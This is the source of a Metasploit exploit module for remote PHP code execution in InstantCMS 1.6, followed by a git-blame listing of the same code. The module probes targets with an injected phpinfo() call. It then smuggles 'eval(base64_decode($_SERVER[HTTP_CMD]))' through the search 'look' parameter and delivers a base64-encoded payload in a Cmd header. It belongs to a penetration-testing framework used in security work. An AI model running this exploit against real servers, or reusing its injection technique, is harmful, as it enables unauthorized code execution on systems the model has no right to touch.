modules/exploits/unix/webapp/instantcms_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'InstantCMS 1.6 Remote PHP Code Execution',
      'Description'    => %q{
        This module exploits an arbitrary PHP command execution vulnerability because of a
        dangerous use of eval() in InstantCMS in versions 1.6 and prior.
      },
      'Author'         =>
        [
          'AkaStep', # Vulnerability discovery and PoC
          'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'BID', '60816' ],
          [ 'PACKETSTORM', '122176' ]
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch' => ARCH_PHP,
      'Targets'        =>
        [
          [ 'InstantCMS 1.6', { }  ],
        ],
      'DisclosureDate' => 'Jun 26 2013',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])
      ])
  end

  def check
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view'	=> 'search',
        'query' => '${echo phpinfo()}'
      }
    })

    if res and res.body.match(/Build Date/)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit

    print_status("Executing payload...")

    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.to_s),
      'vars_get' =>
      {
        'view'	=> 'search',
        'query' => rand_text_alpha(3 + rand(3)),
        'look'  => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"
      },
      'headers' => {
        'Cmd' => Rex::Text.encode_base64(payload.encoded)
      }
    })

  end
end
OCD - Spaces & headings 2017-07-19 11:04:15 +01:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
OCD - Spaces & headings 2017-07-19 11:04:15 +01:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 16:28:54 -05:00			`Rank = ExcellentRanking`
Improve and clean instantcms_exec 2013-07-03 11:37:57 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`include Msf::Exploit::Remote::HttpClient`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
Retab modules 2013-08-30 16:28:54 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',`
			`'Description' => %q{`
			`This module exploits an arbitrary PHP command execution vulnerability because of a`
			`dangerous use of eval() in InstantCMS in versions 1.6 and prior.`
			`},`
			`'Author' =>`
			`[`
			`'AkaStep', # Vulnerability discovery and PoC`
			`'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>', # Metasploit module`
			`'juan vazquez' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'BID', '60816' ],`
Fix current msftidy warnings about PACKETSTORM vs URL 2015-12-24 09:05:02 -08:00			`[ 'PACKETSTORM', '122176' ]`
Retab modules 2013-08-30 16:28:54 -05:00			`],`
			`'Privileged' => false,`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' =>`
			`[`
			`[ 'InstantCMS 1.6', { } ],`
			`],`
			`'DisclosureDate' => 'Jun 26 2013',`
			`'DefaultTarget' => 0))`
Improve and clean instantcms_exec 2013-07-03 11:37:57 -05:00
Retab modules 2013-08-30 16:28:54 -05:00			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
Retab modules 2013-08-30 16:28:54 -05:00			`def check`
			`res = send_request_cgi({`
			`'uri' => normalize_uri(target_uri.to_s),`
			`'vars_get' =>`
			`{`
			`'view' => 'search',`
			`'query' => '${echo phpinfo()}'`
			`}`
			`})`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
Saving progress 2014-01-21 13:03:36 -06:00			`if res and res.body.match(/Build Date/)`
			`return Exploit::CheckCode::Vulnerable`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
Saving progress 2014-01-21 13:03:36 -06:00			`Exploit::CheckCode::Safe`
Retab modules 2013-08-30 16:28:54 -05:00			`end`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
Retab modules 2013-08-30 16:28:54 -05:00			`def exploit`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
Retab modules 2013-08-30 16:28:54 -05:00			`print_status("Executing payload...")`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
Retab modules 2013-08-30 16:28:54 -05:00			`res = send_request_cgi({`
			`'uri' => normalize_uri(target_uri.to_s),`
			`'vars_get' =>`
			`{`
			`'view' => 'search',`
			`'query' => rand_text_alpha(3 + rand(3)),`
			`'look' => "#{rand_text_alpha(3 + rand(3))}\",\"\"); eval(base64_decode($_SERVER[HTTP_CMD]));//"`
			`},`
			`'headers' => {`
			`'Cmd' => Rex::Text.encode_base64(payload.encoded)`
			`}`
			`})`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00
Retab modules 2013-08-30 16:28:54 -05:00			`end`
added InstantCMS 1.6 PHP Code Injection 2013-07-01 11:44:47 -04:00			`end`